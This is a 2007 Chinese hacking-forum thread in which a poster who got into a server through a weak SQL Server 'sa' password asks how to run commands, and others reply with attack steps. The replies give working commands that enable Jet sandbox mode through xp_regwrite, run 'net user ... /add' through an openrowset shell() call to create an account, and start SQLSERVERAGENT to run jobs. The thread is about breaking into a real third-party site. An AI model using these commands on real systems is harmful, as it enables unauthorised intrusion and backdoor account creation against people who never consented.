议题作者：小猪！
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

今天遇到个sa的弱口令搞了下，下面的图是搞的结果！
得到的结果是cmd用不了，上传也用不了！分离器命令不行！还有就是今天看到有个朋友用分离器执行了命令，然后3389SHIFT5次也不行！
不知道大峡们有什么好的方法没？

都大.jpg (1.6 MB)

2007-12-3 16:16

未命名.jpg (312 KB)

2007-12-3 16:16

的命名.jpg (872 KB)

2007-12-3 16:16

未都大名.jpg (1.35 MB)

2007-12-3 16:16

未命名22.jpg (1.73 MB)

2007-12-3 16:16

权限问题，貌似你这根本就不是sa

先 select user 一下，看看是不是 dbo 要是的话，就开启沙盘模式搞他
不用xp_cmdshell 执行命令
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user xxxxx xxxx /add")')

实践证明，你的那个用户为GUEST 权限
不过，好像已经有人拿下了这个站。鬼知道是哪里的黑客~！

沙盒模式在2003下也有用吗？

沙盒模式在2003下也是可以用的
或者看这个
使用SQLSERVERAGENT的JOB来运行系统命令,请先使用下列语句启动SQLSERVERAGENT:
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'